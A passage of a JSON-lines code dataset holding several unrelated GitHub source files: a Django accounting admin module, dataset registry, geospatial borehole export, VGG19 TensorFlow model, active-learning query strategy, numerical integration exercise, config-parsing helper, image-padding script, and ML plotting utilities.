gl_alloc_rpt.init_pdf(gl_alloc)\n # passing debit details\n for db_detail in T10Alc11.objects.filter(alloc_id=gl_alloc.id):\n gl11_detail = T10Gld11.objects.get(id=db_detail.debit_id)\n gl_alloc_rpt.render_details(db_detail, gl11_detail, \"debit\")\n # passing credit details\n for cr_detail in T10Alc12.objects.filter(alloc_id=gl_alloc.id):\n gl11_detail = T10Gld11.objects.get(id=cr_detail.credit_id)\n gl_alloc_rpt.render_details(cr_detail, gl11_detail, \"credit\")\n return gl_alloc_rpt.print_pdf(gl_alloc)\n except Exception as e:\n self.message_user(request, \"No record found\", messages.ERROR)\n\n print_alc_rpt.short_description = \"Print Allocation Report\"\n\n\nadmin.site.register(T10Gla10, T10Gla10Admin)\n\n\nclass T10Brc11Inline(admin.TabularInline):\n model = T10Brc11\n\n def has_add_permission(self, request, obj=None):\n return False\n\n def get_readonly_fields(self, request, obj=None):\n if obj: # editing an existing object\n return self.readonly_fields + (\n \"bank_reco_id\",\n \"gl_id\",\n \"gl_date\",\n \"gl_debit\",\n \"gl_credit\",\n \"narration\",\n \"chq_num\",\n \"chq_date\",\n )\n return self.readonly_fields\n\n def has_delete_permission(self, request, obj=None):\n return False\n\n\nclass T10Brc12Inline(admin.TabularInline):\n model = T10Brc12\n\n def has_add_permission(self, request, obj=None):\n return False\n\n def has_change_permission(self, request, obj=None):\n return False\n\n def has_delete_permission(self, request, obj=None):\n return False\n\n\nclass T10Brc10Admin(T01BaseAdmin):\n list_display = (\"division\", \"bank_account\", \"date_from\", \"date_to\")\n inlines = [T10Brc11Inline]\n readonly_fields = (\"opening_gl_bal\", \"closing_gl_bal\", \"reco_gl_bal\")\n change_form_template = \"ebos2210/admin/t10_bank_reco_change_form.html\"\n\n def get_readonly_fields(self, request, obj=None):\n readonly_fields = super().get_readonly_fields(request, obj)\n if obj: # editing an existing object\n return (\n \"division\",\n \"bank_account\",\n \"date_from\",\n \"date_to\",\n \"opening_gl_bal\",\n \"closing_gl_bal\",\n \"reco_gl_bal\",\n \"opening_stmt_bal\",\n \"closing_stmt_bal\",\n \"import_bank_stmt\",\n )\n return readonly_fields\n\n\nclass T10Mbr10Admin(T10Brc10Admin):\n fields = (\n (\"division\", \"bank_account\"),\n (\"date_from\", \"date_to\"),\n (\"opening_gl_bal\", \"opening_stmt_bal\"),\n )\n exclude = (\n \"proxy_code\",\n \"import_bank_stmt\",\n )\n\n\nadmin.site.register(T10Mbr10, T10Mbr10Admin)\n\n\nclass T10Abr10Admin(T10Brc10Admin):\n form = T10Abr10Form\n fields = (\n (\"division\", \"bank_account\"),\n (\"date_from\", \"date_to\"),\n (\"opening_gl_bal\", \"opening_stmt_bal\"),\n \"import_bank_stmt\",\n )\n\n def get_inlines(self, request, obj):\n inlines = super().get_inlines(request, obj)\n return inlines + [T10Brc12Inline]\n\n\nadmin.site.register(T10Abr10, T10Abr10Admin)\n\n# Transfer Account Balance & Intercompany posting\nclass T10Tic11Admin(admin.TabularInline):\n model = T10Tic11\n readonly_fields = [\"to_amt\", \"alloc_date\"]\n form = T10Tic11Form\n extra = 1\n\n\nclass T10Tic10Admin(admin.ModelAdmin):\n form = T10Tic10Form\n readonly_fields = [\"from_amt\", \"flag_db_cr\"]\n inlines = [T10Tic11Admin]\n actions = [\"post_intercompany_balance\"]\n change_form_template = \"ebos2210/admin/t10_intercompany_change_form.html\"\n\n def get_division_data(self, request, company):\n divisions = list(\n T01Div10.objects.filter(company_id=company).values(\"id\", \"division_name\")\n )\n return JsonResponse({\"divisions\": divisions})\n\n def get_coa_sl_data(self, request, division):\n coas = list(\n T01Coa10.objects.filter(division_id=division, coa_control=\"2\").values(\n \"id\", \"account_name\"\n )\n )\n subledgers = list(\n T01Sld10.objects.filter(division_id=division).values(\"id\", \"subledger_name\")\n )\n\n return JsonResponse({\"coas\": coas, \"subledgers\": subledgers})\n\n def get_urls(self):\n urls = super().get_urls()\n custom_urls = [\n path(\"add/get_division//\", self.get_division_data),\n path(\"add/get_coa_sl//\", self.get_coa_sl_data),\n ]\n return custom_urls + urls\n\n \"\"\"Intercompany / division balance posting custom action functionality\"\"\"\n\n @admin.action(description=\"Post intercompany / division balance\")\n def post_intercompany_balance(self, request, queryset):\n posted = 0\n intercom_list = []\n\n for q in queryset:\n if q.from_amt == 0:\n intercom_list.append(q.ic_coa)\n else:\n if q.post_intercompany_balance():\n posted += 1\n\n if posted > 0:\n self.message_user(\n request,\n ngettext(\n \"%d successfully posted.\",\n \"%d successfully posted.\",\n posted,\n )\n % posted,\n messages.SUCCESS,\n )\n else:\n self.message_user(request, \"Something wrong\", messages.ERROR)\n\n if intercom_list.exists():\n intercom_str = \",\".join(intercom_list)\n self.message_user(\n request,\n f\"Zero amount, nothing to allocate for {intercom_str}\",\n messages.ERROR,\n )\n\n\nadmin.site.register(T10Tic10, T10Tic10Admin)\n","repo_name":"KripKrop72724/ebos_replicate","sub_path":"ebos2210/admin/a10_fin_gl.py","file_name":"a10_fin_gl.py","file_ext":"py","file_size_in_byte":17228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"10817502627","text":"import importlib\nimport inspect\nfrom collections import OrderedDict\nfrom pathlib import Path\nfrom typing import NamedTuple, Type\n\nimport pandas as pd\n\nfrom .licenses import License\n\n\n_REGISTRY = {}\n\n\nclass Description(NamedTuple):\n body_region: str = None\n license: str = None\n link: str = None\n modality: str = None\n prep_data_size: str = None\n raw_data_size: str = None\n task: str = None\n\n\ndef register(**kwargs):\n def decorator(cls: Type):\n name = cls.__name__\n module = inspect.getmodule(inspect.stack()[1][0]).__name__\n assert name not in _REGISTRY, name\n _REGISTRY[name] = cls, module, description\n return cls\n\n description = Description(**kwargs)\n return decorator\n\n\ndef gather_datasets():\n for f in Path(__file__).resolve().parent.parent.iterdir():\n module_name = f'amid.{f.stem}'\n importlib.import_module(module_name)\n\n return OrderedDict((k, _REGISTRY[k]) for k in sorted(_REGISTRY))\n\n\ndef prepare_for_table(name, cls, module, description, version):\n def stringify(x):\n if pd.isnull(x):\n return ''\n if isinstance(x, str):\n return x\n if isinstance(x, (list, tuple)):\n return ', '.join(x)\n return x\n\n entry = {'name': name, 'entries': len(cls().ids)}\n entry.update({k: v for k, v in description._asdict().items() if not pd.isnull(v)})\n license_ = entry.get('license', None)\n if license_:\n if isinstance(license_, License):\n license_ = f'{license_.name}'\n entry['license'] = license_\n\n link = entry.pop('link', None)\n if link is not None:\n entry['link'] = f'Source'\n\n entry['name'] = f'{name}'\n return {k: stringify(v) for k, v in entry.items()}\n","repo_name":"neuro-ml/amid","sub_path":"amid/internals/registry.py","file_name":"registry.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"51"} +{"seq_id":"15127372291","text":"import geopandas as gpd\nimport pandas as pd\n\ninfile = r\"output\\UDF_Boreholes.gpkg\"\n\ngdf = gpd.read_file(infile, layer='UDF_Bores').to_crs(\"epsg:28355\")\n\ngdf['X'] = [g.x for g in gdf.geometry]\ngdf['Y'] = [g.y for g in gdf.geometry]\n\ndf_export = gdf[['HydroCode', 'HydroID', 'X', 'Y', 'GALandElev', 'DrilledDepth']]\n\n\nmask = pd.isnull(df_export.HydroCode)\n\nmissing_names = gdf[mask]['BoreName'].values\n\ndf_export.at[df_export[mask].index, \"HydroCode\"] = missing_names\n\ndf_export.fillna(0).to_csv(r\"output\\UDF_headers.txt\", sep = \"\\t\", index = False)\n\n# now export the well tops\n\ngdf_bl = gpd.read_file(infile, layer='UDF_BoreLog')\n\n# join to get the coordinates\n\ndf_bl_export = gdf_bl.merge(gdf[['HydroID', 'X', 'Y']], left_on=\"BoreID\", right_on=\"HydroID\")[['BoreID', 'HydroCode', 'FromDepth', 'GA_UNIT', \"X\", \"Y\", \"TopElev\"]]\n\nmask = pd.notnull(df_bl_export.GA_UNIT)\n\n# export\ndf_bl_export[mask].to_csv(r\"output\\UDF_formation_top.txt\", sep = \"\\t\", index = False)\n\n# now we export lithlogs\n\n\ngdf_ll = gpd.read_file(infile, layer='UDF_LithologyLog')\n\ndf_ll_export = gdf_ll.merge(gdf[['HydroID', 'X', 'Y']], left_on=\"BoreID\", right_on=\"HydroID\")[['BoreID', 'HydroCode', 'FromDepth', \"ToDepth\", 'GALithType', 'MajorLithCode', 'MinorLithCode', 'Description', \"X\", \"Y\", \"TopElev\"]]\n\ndf_ll_export.fillna(\"\", inplace=True)\n\n# export\ndf_ll_export.to_csv(r\"output\\UDF_lithlog.txt\", sep = \"\\t\", index = False)\n\n","repo_name":"Neil-Symington/UDF_boreholde_data","sub_path":"scripts/boreholedb2petrel.py","file_name":"boreholedb2petrel.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"9257910573","text":"import numpy as np\nimport tensorflow as tf\n\n\ndef build(shape, pool_method, pool_stride):\n \"\"\"\n input image is rgb image [batch, height, width, 3]\n Load params of VGG19 trained on imagenet; the params are downloaded from\n https://github.com/machrisaa/tensorflow-vgg as numpy compressed (npz) file\n \"\"\"\n params = np.load('vgg19.npy', encoding='latin1').item()\n\n def _pool(input_, name, method, stride):\n if method == 'avg':\n return tf.nn.avg_pool(input_,\n ksize=[1, stride, stride, 1],\n strides=[1, stride, stride, 1],\n padding='SAME',\n name=name)\n elif method == 'max':\n return tf.nn.max_pool(input_,\n ksize=[1, stride, stride, 1],\n strides=[1, stride, stride, 1],\n padding='SAME',\n name=name)\n else:\n raise ValueError('Invalid pool_method')\n\n def _conv_layer(input_, name):\n kernel = tf.constant(params[name][0], name='kernel')\n bias = tf.constant(params[name][1], name='bias')\n\n conv_output = tf.nn.conv2d(input_, kernel,\n strides=[1, 1, 1, 1], padding='SAME')\n relu_output = tf.nn.relu(conv_output + bias)\n return relu_output\n\n graph = {}\n shape = np.zeros((1, shape[0], shape[1], 3))\n graph['input'] = tf.Variable(shape, dtype=tf.float32)\n graph['conv1_1'] = _conv_layer(graph['input'], 'conv1_1')\n graph['conv1_2'] = _conv_layer(graph['conv1_1'], 'conv1_2')\n graph['pool1'] = _pool(graph['conv1_2'], 'pool1', pool_method, pool_stride)\n\n graph['conv2_1'] = _conv_layer(graph['pool1'], 'conv2_1')\n graph['conv2_2'] = _conv_layer(graph['conv2_1'], 'conv2_2')\n graph['pool2'] = _pool(graph['conv2_2'], 'pool2', pool_method, pool_stride)\n\n graph['conv3_1'] = _conv_layer(graph['pool2'], 'conv3_1')\n graph['conv3_2'] = _conv_layer(graph['conv3_1'], 'conv3_2')\n graph['conv3_3'] = _conv_layer(graph['conv3_2'], 'conv3_3')\n graph['conv3_4'] = _conv_layer(graph['conv3_3'], 'conv3_4')\n graph['pool3'] = _pool(graph['conv3_4'], 'pool3', pool_method, pool_stride)\n\n graph['conv4_1'] = _conv_layer(graph['pool3'], 'conv4_1')\n graph['conv4_2'] = _conv_layer(graph['conv4_1'], 'conv4_2')\n graph['conv4_3'] = _conv_layer(graph['conv4_2'], 'conv4_3')\n graph['conv4_4'] = _conv_layer(graph['conv4_3'], 'conv4_4')\n graph['pool4'] = _pool(graph['conv4_4'], 'pool4', pool_method, pool_stride)\n\n graph['conv5_1'] = _conv_layer(graph['pool4'], 'conv5_1')\n graph['conv5_2'] = _conv_layer(graph['conv5_1'], 'conv5_2')\n graph['conv5_3'] = _conv_layer(graph['conv5_2'], 'conv5_3')\n graph['conv5_4'] = _conv_layer(graph['conv5_3'], 'conv5_4')\n graph['pool5'] = _pool(graph['conv5_4'], 'pool5', pool_method, pool_stride)\n\n return graph\n","repo_name":"ek-ok/neural-artistist","sub_path":"vgg19.py","file_name":"vgg19.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"42218609814","text":"\"\"\"Maximum loss reduction with Maximal Confidence (MMC)\n\"\"\"\nimport copy\n\nimport numpy as np\nfrom sklearn.svm import SVC\n\nfrom libact.base.dataset import Dataset\nfrom libact.base.interfaces import QueryStrategy, ContinuousModel\nfrom libact.utils import inherit_docstring_from, seed_random_state, zip\nfrom libact.models import LogisticRegression, SklearnProbaAdapter\nfrom libact.models.multilabel import BinaryRelevance, DummyClf\n\n\nclass MaximumLossReductionMaximalConfidence(QueryStrategy):\n r\"\"\"Maximum loss reduction with Maximal Confidence (MMC)\n\n This algorithm is designed to use binary relavance with SVM as base model.\n\n Parameters\n ----------\n base_learner : :py:mod:`libact.query_strategies` object instance\n The base learner for binary relavance, should support predict_proba\n\n br_base : ProbabilisticModel object instance\n The base learner for the binary relevance in MMC.\n Should support predict_proba.\n\n logreg_param : dict, optional (default={})\n Setting the parameter for the logistic regression that are used to\n predict the number of labels for a given feature vector. Parameter\n detail please refer to:\n http://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LogisticRegression.html\n\n random_state : {int, np.random.RandomState instance, None}, optional (default=None)\n If int or None, random_state is passed as parameter to generate\n np.random.RandomState instance. if np.random.RandomState instance,\n random_state is the random number generate.\n\n Attributes\n ----------\n logistic_regression\\_ : :py:mod:`libact.models.LogisticRegression` object instance\n The model used to predict the number of label in each instance.\n Should support multi-class classification.\n\n Examples\n --------\n Here is an example of declaring a MMC query_strategy object:\n\n .. code-block:: python\n\n from libact.query_strategies.multilabel import MMC\n from sklearn.linear_model import LogisticRegression\n\n qs = MMC(\n dataset, # Dataset object\n br_base=LogisticRegression()\n )\n\n References\n ----------\n .. [1] Yang, Bishan, et al. \"Effective multi-label active learning for text\n\t\t classification.\" Proceedings of the 15th ACM SIGKDD international\n\t\t conference on Knowledge discovery and data mining. ACM, 2009.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(MaximumLossReductionMaximalConfidence, self).__init__(*args, **kwargs)\n\n # self.n_labels = len(self.dataset.get_labeled_entries()[0][1])\n self.n_labels = len(self.dataset.get_labeled_entries()[1][0])\n\n random_state = kwargs.pop('random_state', None)\n self.random_state_ = seed_random_state(random_state)\n\n self.logreg_param = kwargs.pop('logreg_param',\n {'multi_class': 'multinomial',\n 'solver': 'newton-cg',\n 'random_state': random_state})\n self.logistic_regression_ = LogisticRegression(**self.logreg_param)\n\n self.br_base = kwargs.pop('br_base',\n SklearnProbaAdapter(SVC(kernel='linear',\n probability=True,\n gamma=\"auto\",\n random_state=random_state)))\n\n @inherit_docstring_from(QueryStrategy)\n def make_query(self):\n dataset = self.dataset\n labeled_pool, Y = dataset.get_labeled_entries()\n unlabeled_entry_ids, X_pool = dataset.get_unlabeled_entries()\n labeled_pool = np.array(labeled_pool)\n Y = np.array(Y)\n X_pool = np.array(X_pool)\n\n br = BinaryRelevance(self.br_base)\n br.train(Dataset(labeled_pool, Y))\n\n trnf = br.predict_proba(labeled_pool)\n poolf = br.predict_proba(X_pool)\n f = poolf * 2 - 1\n\n trnf = np.sort(trnf, axis=1)[:, ::-1]\n trnf /= np.tile(trnf.sum(axis=1).reshape(-1, 1), (1, trnf.shape[1]))\n if len(np.unique(Y.sum(axis=1))) == 1:\n lr = DummyClf()\n else:\n lr = self.logistic_regression_\n lr.train(Dataset(trnf, Y.sum(axis=1)))\n\n idx_poolf = np.argsort(poolf, axis=1)[:, ::-1]\n poolf = np.sort(poolf, axis=1)[:, ::-1]\n poolf /= np.tile(poolf.sum(axis=1).reshape(-1, 1), (1, poolf.shape[1]))\n pred_num_lbl = lr.predict(poolf).astype(int)\n\n yhat = -1 * np.ones((len(X_pool), self.n_labels), dtype=int)\n for i, p in enumerate(pred_num_lbl):\n yhat[i, idx_poolf[i, :p]] = 1\n\n score = ((1 - yhat * f) / 2).sum(axis=1)\n ask_id = self.random_state_.choice(np.where(score == np.max(score))[0])\n return unlabeled_entry_ids[ask_id]\n","repo_name":"ntucllab/libact","sub_path":"libact/query_strategies/multilabel/maximum_margin_reduction.py","file_name":"maximum_margin_reduction.py","file_ext":"py","file_size_in_byte":4830,"program_lang":"python","lang":"en","doc_type":"code","stars":767,"dataset":"github-code","pt":"51"} +{"seq_id":"3001244954","text":"from PIL import Image\r\nimport ctypes\r\nimport resize_img.py\r\n\r\n#f = open(\"C:\\\\Users\\\\yuri\\\\Documents\\\\Yuri's work\\\\0. Assorted\\\\_Script\\\\_image processing\\\\Python\\\\2. Placing images on 1000x1000\\\\_text\\\\importFileNih.txt\", 'r+', encoding='utf-8')\r\n#importFileName = [line for line in f.read().splitlines()]\r\n#f.close()\r\n\r\n#white = (255,255,255)\r\n#image = Image.new('RGB', (1000,1000), white)\r\n#image.save(\"C:\\\\Users\\\\yuri\\\\Documents\\\\Yuri's work\\\\0. Assorted\\\\_Script\\\\_image processing\\\\Python\\\\2. Placing images on 1000x1000\\\\ngetest.jpg\")\r\n\r\nimg = Image.open(\"C:\\\\Users\\\\yuri\\\\Documents\\\\Yuri's work\\\\0. Assorted\\\\_Script\\\\_image processing\\\\Python\\\\2. Placing images on 1000x1000\\\\SS-22 - GEDEAN.jpg\", 'r')\r\nimg.convert('RGB')\r\n\r\nmaxSize = (1000, 1000)\r\nimg.thumbnail(maxSize, Image.ANTIALIAS)\r\n\r\nimg_w, img_h = img.size\r\nwhite = (255, 255, 255, 255)\r\nbackground = Image.new('RGB', (1000, 1000), white)\r\nbg_w, bg_h = background.size\r\noffset = ((bg_w - img_w) // 2, (bg_h - img_h) // 2)\r\nbackground.paste(img, offset)\r\nbackground.save(\"C:\\\\Users\\\\yuri\\\\Documents\\\\Yuri's work\\\\0. Assorted\\\\_Script\\\\_image processing\\\\Python\\\\2. Placing images on 1000x1000\\\\ngetest2.jpg\")\r\n\r\n###############################\r\n\r\n#width = 1000\r\n#height = 1000\r\n#imgOri = Image.open(\"C:\\\\Users\\\\yuri\\\\Documents\\\\Yuri's work\\\\0. Assorted\\\\_Script\\\\_image processing\\\\Python\\\\2. Placing images on 1000x1000\\\\SS-22.jpg\", 'r')\r\n#imgOri.convert('RGB')\r\n#w, h = imgOri.size\r\n\r\n","repo_name":"spartacruz/Resizer-Image","sub_path":"Placing Images.py","file_name":"Placing Images.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"42239615974","text":"'''\n/**\n * date : 15:56, 2022-04-28\n * author : Ruijie Zhang@Huazhong University of Sci & Tech\n * mail : zrjhust@gmail.com\n**/\n'''\n\nimport numpy as np\nimport time\nimport copy\n\ndef e42():\n\tdef f_s(q):\n\t\tif q == 1:\n\t\t\treturn lambda x: 0.1*(x**6) - x**2 + x,0,2,122/105\n\t\tif q == 2:\n\t\t\treturn lambda x: x*x**(1/2),0,1,2/5\n\t\tif q == 3:\n\t\t\treturn lambda x: 1/(x**(1/2)),5,200,2*np.sqrt(200)-2*np.sqrt(5)\n\tdef sim_calcu_nomal(a,b,func,intervals):\n\t\tn = intervals# intervals\n\t\th = abs(a-b)/n\n\t\tans = func(a)+func(b)\n\t\tv1,v2 = 0,0\n\t\tfor i in range(0,n):\n\t\t\tv1 += func(a + h*(i+1/2))\n\t\tfor i in range(1,n):\n\t\t\tv2 += func(a + h*i)\n\t\tans = (h/6)*(ans + 4*v1 + 2*v2)\n\t\treturn n,ans\n\n\tdef sim_calcu_n(a,b,func,intervals=1):\n\t\tdelta = 0.5*1e-7\n\t\tn,ans = sim_calcu_nomal(a,b,func,intervals)\n\t\ttemp = 0\n\t\twhile abs(ans - temp) >= (4**2-1)*delta:\n\t\t\ttemp = ans\n\t\t\tintervals *= 2\n\t\t\tn,ans = sim_calcu_nomal(a,b,func,intervals)\n\n\t\treturn n,ans\n\n\tq=int(input('选择所查看的小问(请输入int类型)'))\n\tfunc,a,b,real = f_s(q)\n\tn,ans = sim_calcu_n(a,b,func)\n\tprint(\"真实值:\",real)\n\tprint(\"simpson逐次区间分半法:\",\"\\n\",\"所需节点数:\",n,\"\\n\",\"得到结果:\",ans)\n\n\n\tdelta = 0.5*1e-7\n\tin_sim = 1\n\tn_sim,re_sim = sim_calcu_nomal(a,b,func,in_sim)\n\twhile abs(real - re_sim) >= delta:\n\t\tin_sim += 1\n\t\tn_sim , re_sim = sim_calcu_nomal(a,b,func,in_sim)\n\tprint(\"复化simpson法:\",\"\\n\",\"所需节点数:\",n_sim,\"\\n\",\"得到结果:\",re_sim)","repo_name":"K1seki221/numerical_analysis_experiment","sub_path":"e42.py","file_name":"e42.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"12769302069","text":"# _*_coding:utf-8_*_\n\nfrom box import Box\nfrom configparser import ConfigParser\n\n#source: https://www.jianshu.com/p/2e795cba28ab\n#https://github.com/cdgriffith/Box\n#https://zhuanlan.zhihu.com/p/437046499\n\nclass ConfTool(ConfigParser):\n\n def __init__(self, file, encoding=\"utf-8\"):\n # 执行父类的构造函数\n super().__init__()\n self.read(filenames=file, encoding=encoding)\n\n # 获取不到section或者option,直接返回给定的默认值\n def get_or_default(self, section, option, default=None):\n if not self.has_section(section):\n return default\n elif not self.has_option(section, option):\n return default\n # https://github.com/cdgriffith/Box\n return self.get(section=section, option=option)\n\n # ini文件内容转换成dict输出\n def to_dict(self):\n _dict = {}\n for section in self.sections():\n # print(dict(self.items(\"mysql_conf\")))\n _option_dict = dict(self.items(section=section))\n _dict.update({section: _option_dict})\n return _dict\n\n # 使用python-box模块,方便链式调用\n def __getattr__(self, item):\n '''\n __getattr__函数的作用: 如果属性查找(attribute lookup)在实例以及对应的类中(通过__dict__)失败, 那么会调用到类的__getattr__函数, 如果没有定义这个函数,那么抛出AttributeError异常。由此可见,__getattr__一定是作用于属性查找的最后一步,兜底。\n\n '''\n # Box 返回对象自身 self, 方便调用其属性/函数,所以叫做链式调用,如self.len().sum().value\n _box = Box(self.to_dict())\n # https://www.jianshu.com/p/2bc2605f84fb\n # getattr(object, name[, default])\n # 类,函数或者属性变量,找不到函数或属性返回内容\n return getattr(_box, item)\n\n\nif __name__ == '__main__':\n conf = ConfTool(file=\"./db_conf.ini\")\n # 配置文件中如没有配置mysql登录名user字段,则默认取root\n print(conf.get_or_default(\"mysql_conf\", \"user\", \"root\"))\n print(conf.to_dict())\n # 可以通过属性调用的形式,获取配置\n print(conf.mysql_conf.host)\n'''\n[mysql_conf] ; 1、在ini配置文件中,[]中的值被称为section\nhost = 127.0.0.1 ; 3、一个section下的键值对被称为option\nport = 3306 ; 4、同一个section下也可以存在多个option,也就是多个键值对的配置项\nusername = root\npassword = 123456\n[python] ; 2、同一个ini文件中可以存在多个section\nversion = 0.1.9\nsystem_env = mac\n'''\n","repo_name":"liuyinzhe/template_script","sub_path":"model/configparser/ini_parser.py","file_name":"ini_parser.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"13443903083","text":"\n#####This is taken from the Data provider\"\"dont understand why it is necessary\"\"\"\"\n\n\n\n\n# adapted from projects finding_donors and customer_segments\n###########################################\n# Suppress matplotlib user warnings\n# Necessary for newer version of matplotlib\nimport warnings\n\nwarnings.filterwarnings(\"ignore\", category=UserWarning, module=\"matplotlib\")\n#\n# Display inline matplotlib plots with IPython\nfrom IPython import get_ipython\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n###########################################\n\nimport matplotlib.pyplot as pl\nimport matplotlib.patches as mpatches\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\n\ndef distribution(data, transformed=False):\n \"\"\"\n Visualization code for displaying skewed distributions of features\n \"\"\"\n\n # Create figure\n fig = pl.figure(figsize=(11, 5));\n\n # Skewed feature plotting\n for i, feature in enumerate(['capital-gain', 'capital-loss']):\n ax = fig.add_subplot(1, 2, i + 1)\n ax.hist(data[feature], bins=25, color='#00A0A0')\n ax.set_title(\"'%s' Feature Distribution\" % (feature), fontsize=14)\n ax.set_xlabel(\"Value\")\n ax.set_ylabel(\"Number of Records\")\n ax.set_ylim((0, 2000))\n ax.set_yticks([0, 500, 1000, 1500, 2000])\n ax.set_yticklabels([0, 500, 1000, 1500, \">2000\"])\n\n # Plot aesthetics\n if transformed:\n fig.suptitle(\"Log-transformed Distributions of Continuous Census Data Features\", \\\n fontsize=16, y=1.03)\n else:\n fig.suptitle(\"Skewed Distributions of Continuous Census Data Features\", \\\n fontsize=16, y=1.03)\n\n fig.tight_layout()\n fig.show()\n\n\ndef evaluate(results, accuracy, f1):\n \"\"\"\n Visualization code to display results of various learners.\n \n inputs:\n - learners: a list of supervised learners\n - stats: a list of dictionaries of the statistic results from 'train_predict()'\n - accuracy: The score for the naive predictor\n - f1: The score for the naive predictor\n \"\"\"\n\n # Create figure\n fig, ax = pl.subplots(2, 3, figsize=(11, 7))\n\n # Constants\n bar_width = 0.25\n colors = ['#A00000', '#00A0A0', '#00A000', 'yellow']\n\n # Super loop to plot four panels of data\n for k, learner in enumerate(results.keys()):\n for j, metric in enumerate(['train_time', 'acc_train', 'f_train', 'pred_time', 'acc_test', 'f_test']):\n for i in np.arange(3):\n # Creative plot code\n ax[j // 3, j % 3].bar(i + k * bar_width, results[learner][i][metric], width=bar_width, color=colors[k])\n ax[j // 3, j % 3].set_xticks([0.45, 1.45, 2.45])\n ax[j // 3, j % 3].set_xticklabels([\"1%\", \"10%\", \"100%\"])\n ax[j // 3, j % 3].set_xlabel(\"Training Set Size\")\n ax[j // 3, j % 3].set_xlim((-0.1, 3.0))\n\n # Add unique y-labels\n ax[0, 0].set_ylabel(\"Time (in seconds)\")\n ax[0, 1].set_ylabel(\"Accuracy Score\")\n ax[0, 2].set_ylabel(\"F-score\")\n ax[1, 0].set_ylabel(\"Time (in seconds)\")\n ax[1, 1].set_ylabel(\"Accuracy Score\")\n ax[1, 2].set_ylabel(\"F-score\")\n\n # Add titles\n ax[0, 0].set_title(\"Model Training\")\n ax[0, 1].set_title(\"Accuracy Score on Training Subset\")\n ax[0, 2].set_title(\"F-score on Training Subset\")\n ax[1, 0].set_title(\"Model Predicting\")\n ax[1, 1].set_title(\"Accuracy Score on Testing Set\")\n ax[1, 2].set_title(\"F-score on Testing Set\")\n\n # Add horizontal lines for naive predictors\n ax[0, 1].axhline(y=accuracy, xmin=-0.1, xmax=3.0, linewidth=1, color='k', linestyle='dashed')\n ax[1, 1].axhline(y=accuracy, xmin=-0.1, xmax=3.0, linewidth=1, color='k', linestyle='dashed')\n ax[0, 2].axhline(y=f1, xmin=-0.1, xmax=3.0, linewidth=1, color='k', linestyle='dashed')\n ax[1, 2].axhline(y=f1, xmin=-0.1, xmax=3.0, linewidth=1, color='k', linestyle='dashed')\n\n # Set y-limits for score panels\n ax[0, 1].set_ylim((0, 1))\n ax[0, 2].set_ylim((0, 1))\n ax[1, 1].set_ylim((0, 1))\n ax[1, 2].set_ylim((0, 1))\n\n # Create patches for the legend\n patches = []\n for i, learner in enumerate(results.keys()):\n patches.append(mpatches.Patch(color=colors[i], label=learner))\n pl.legend(handles=patches, bbox_to_anchor=(-.80, 2.53), \\\n loc='upper center', borderaxespad=0., ncol=4, fontsize='x-large')\n\n # Aesthetics\n pl.suptitle(\"Performance Metrics for Three Supervised Learning Models\", fontsize=16, y=1.10)\n # pl.tight_layout()\n pl.show()\n\n\ndef feature_plot(importances, X_train, num_features):\n # Display the five most important features\n indices = np.argsort(importances)[::-1]\n columns = X_train.columns.values[indices[:num_features]]\n values = importances[indices][:num_features]\n\n # Creat the plot\n fig = pl.figure(figsize=(9, 5))\n pl.title(\"Normalized Weights for First \" + str(num_features) + \" Most Predictive Features\", fontsize=16)\n pl.bar(np.arange(num_features), values, width=0.6, align=\"center\", color='#00A000', \\\n label=\"Feature Weight\")\n pl.bar(np.arange(num_features) - 0.3, np.cumsum(values), width=0.2, align=\"center\", color='#00A0A0', \\\n label=\"Cumulative Feature Weight\")\n pl.xticks(np.arange(num_features), columns)\n pl.xlim((-0.5, num_features - .5))\n pl.ylabel(\"Weight\", fontsize=12)\n pl.xlabel(\"Feature\", fontsize=12)\n\n pl.legend(loc='upper center')\n pl.tight_layout()\n pl.show()\n return columns\n\n\ndef pca_results(good_data, pca):\n '''\n Create a DataFrame of the PCA results\n Includes dimension feature weights and explained variance\n Visualizes the PCA results\n '''\n\n # Dimension indexing\n dimensions = ['Dimension {}'.format(i) for i in range(1, len(pca.components_) + 1)]\n\n # PCA components\n components = pd.DataFrame(np.round(pca.components_, 4), columns=list(good_data.keys()))\n components.index = dimensions\n\n # PCA explained variance\n ratios = pca.explained_variance_ratio_.reshape(len(pca.components_), 1)\n variance_ratios = pd.DataFrame(np.round(ratios, 4), columns=['Explained Variance'])\n variance_ratios.index = dimensions\n\n # Create a bar plot visualization\n fig, ax = plt.subplots(figsize=(14, 8))\n\n # Plot the feature weights as a function of the components\n components.plot(ax=ax, kind='bar');\n ax.set_ylabel(\"Feature Weights\")\n ax.set_xticklabels(dimensions, rotation=0)\n\n # Display the explained variance ratios\n for i, ev in enumerate(pca.explained_variance_ratio_):\n ax.text(i - 0.40, ax.get_ylim()[1] + 0.05, \"Explained Variance\\n %.4f\" % (ev))\n\n # Return a concatenated DataFrame\n return pd.concat([variance_ratios, components], axis=1)\n\n\nfrom sklearn.metrics import fbeta_score\nfrom sklearn.metrics import accuracy_score\nfrom time import time\n\n\ndef train_predict(learner, sample_size, X_train, y_train, X_test, y_test, beta):\n '''\n inputs:\n - learner: the learning algorithm to be trained and predicted on\n - sample_size: the size of samples (number) to be drawn from training set\n - X_train: features training set\n - y_train: income training set\n - X_test: features testing set\n - y_test: income testing set\n '''\n\n results = {}\n\n start = time()\n learner = learner.fit(X_train[:sample_size], 